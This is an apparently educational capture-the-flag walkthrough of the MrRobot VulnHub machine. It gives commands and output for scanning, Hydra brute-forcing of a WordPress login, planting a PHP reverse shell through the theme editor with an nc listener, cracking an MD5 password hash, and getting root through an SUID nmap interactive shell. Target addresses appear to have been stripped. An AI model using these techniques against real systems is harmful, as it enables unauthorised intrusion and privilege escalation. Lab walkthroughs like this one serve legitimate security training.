MrRobot CTF VM WalkThrough from VulnHub

VM : MrRobot

Download Link :,241/

Getting Target machine IP :

Scan the whole network to identify the target IP.
 nmap -sP
-sP sends ICMP echo request and only tells if host is up or down. Our target system is

Scanning the target
 $ nmap -sV -oN target.scan
 22/tcp  closed ssh
 80/tcp  open   http     Apache httpd
 443/tcp open   ssl/http Apache httpd

There are only two ports open.

-oN stores the output in a normal file(target.scan), theres also various format available.

At port 80 the web page is available, but theres nothing any interesting data.

Scanning the target web server for hiden urls and other stuffs
 $ dirb -o dirb.scan
It seem there have some problem on scanning(because i am running attacker machine on docker container), so i need to use -w option to ignore the warning.
 $ dirb -o dirb.scan
Scanning for wordpress website :
 $ wpscan --url
Some of the important findings are :
where at a wordpress website is hosted.

Now the robots.txt file have some interested things, so first download it.
 $ wget
 --2019-11-13 15:52:46--
 Connecting to connected.
 HTTP request sent, awaiting response... 200 OK
 Length: 41 [text/plain]
 Saving to: 'robots.txt'
 robots.txt           100%[========================>]      41  --.-KB/s    in 0s
 2019-11-13 15:52:46 (4.69 MB/s) - 'robots.txt' saved [41/41]
 $ cat robots.txt
 User-agent: *
As we can see that we find our first key and a another file fsocity.dic, now download it.
 $ wget
 $ cat key-1-of-3.txt
It contains the flag value. Now lets check another file.
 $ wget
This file contains the list of 858160 words.
 wc -l fsocity.dic
Now let sort the file and remove duplicates
 $ cat fsocity.dic | sort | uniq > fsocity_sorted.dic
Now the file length is 11451. This list can be login for the wordpress website. So try to bruteforce the wordpress login with this list. First we bruteforce the username field then password field. For bruteforec we are going to use hydra.

BruteForcing WordPress Login with Hydra :

For basics use hydra refer to this :

Bruteforcing username:
 $ hydra -vV -L fsocity_sorted.dic -p randompass http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:Invalid username" -o success
Where -o success option is used to store result working keys. Contents of success file :
 [80][http-post-form] host:   login: ELLIOT   password: randompass
 [80][http-post-form] host:   login: Elliot   password: randompass
 [80][http-post-form] host:   login: elliot   password: randompa
the username is found, then we can bruteforce the password file with same list.
 $ hydra -vV -l elliot -P fsocity_sorted.dic http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:incorrect" 
Password fount : ER28-0652

We can also use wpscan, for example :
 $ wpscan --url --usernames elliot --passwords fsocity_sorted.dic --wp-content-dir ""

Droping Backdoor on Wordpress :

First login to wordpress with above credentials and go to Appearance > Editor

Get the php reverse shell code from : Click here to download

Change the IP on script to your attacker machine and port number then put it on the Main Index page

Now start backdoor listener
 $ nc -vvlp 1234
and open wordpress index file.
 ajay@MBot:~$ nc -vvlp 1234
 Listening on [] (family 0, port 1234)
 Connection from 47906 received!
 Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
  00:13:18 up  3:57,  0 users,  load average: 0.00, 0.08, 0.46
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=1(daemon) gid=1(daemon) groups=1(daemon)
 /bin/sh: 0: can't access tty; job control turned off
In the /home/robot folder we found 2nd key file, currently we don't have the permission to open it.
 $ cd home/robot
 $ ls
 $ cat key-2-of-3.txt
 cat: key-2-of-3.txt: Permission denied
 $ whoami
But we the permission to read password.raw-md5 file
 $ cat password.raw-md5
which looks like md5 unslated password hash. Now to crack that we can use JTR(John the ripper) or john password cracking tool.
 $ cat passhash.txt
 $ john passhash.txt
But it takes time,so we can also use online hash cracking service from

So the password is :
Now lets try to login as robot with above password
 $ sudo robot
 sudo: no tty present and no askpass program specified
 $ python -c 'import pty; pty.spawn("/bin/bash")'  
 daemon@linux:/home/robot$ su robot
 su robot
 Password: abcdefghijklmnopqrstuvwxyz
 robot@linux:~$ cat key-2-of-3.txt
 cat key-2-of-3.txt
We can get 2nd flag also. Note that the python -c 'import pty; pty.spawn("/bin/bash")' is used to spawn a tty shell.

Privilege Escalation to root :

There are various methods for privilege escalation, which can be found here : Link (Click Here)

For this VM first we try to find a binary with SUID root.
 $ find / -perm -4000 -user root -exec ls -ld {} \; 2>/dev/null
 -rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping
 -rwsr-xr-x 1 root root 69120 Feb 12  2015 /bin/umount
 -rwsr-xr-x 1 root root 94792 Feb 12  2015 /bin/mount
 -rwsr-xr-x 1 root root 44680 May  7  2014 /bin/ping6
 -rwsr-xr-x 1 root root 36936 Feb 17  2014 /bin/su
 -rwsr-xr-x 1 root root 47032 Feb 17  2014 /usr/bin/passwd
 -rwsr-xr-x 1 root root 32464 Feb 17  2014 /usr/bin/newgrp
 -rwsr-xr-x 1 root root 41336 Feb 17  2014 /usr/bin/chsh
 -rwsr-xr-x 1 root root 46424 Feb 17  2014 /usr/bin/chfn
 -rwsr-xr-x 1 root root 68152 Feb 17  2014 /usr/bin/gpasswd
 -rwsr-xr-x 1 root root 155008 Mar 12  2015 /usr/bin/sudo
 -rwsr-xr-x 1 root root 504736 Nov 13  2015 /usr/local/bin/nmap
 -rwsr-xr-x 1 root root 440416 May 12  2014 /usr/lib/openssh/ssh-keysign
 -rwsr-xr-x 1 root root 10240 Feb 25  2014 /usr/lib/eject/dmcrypt-get-device
 -r-sr-xr-x 1 root root 9532 Nov 13  2015 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
 -r-sr-xr-x 1 root root 14320 Nov 13  2015 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
 -rwsr-xr-x 1 root root 10344 Feb 25  2015 /usr/lib/pt_chown
At above we use find commands which finds files with SUID and then -exec options will run ls -ld command on the file, 2>/dev/null will redirect all the errors.

Now there is an interesting finding :
 -rwsr-xr-x 1 root root 504736 Nov 13  2015 /usr/local/bin/nmap
Now there is a method to get root shell with nmap (if it support --interactive option`), which can be found on this article :

Now get a root shell with nmap
 $ nmap --interactive
 Starting nmap V. 3.81 ( )
 Welcome to Interactive Mode -- press h <enter> for help
 nmap> !sh
 # whoami
!! We get a root shell. Now lets find 3rd key.
 # cd /root
 cd /root
 # ls
 firstboot_done key-3-of-3.txt
 # cat key-3-of-3.txt
 cat key-3-of-3.txt
Thats it. !!!

We found all the keys.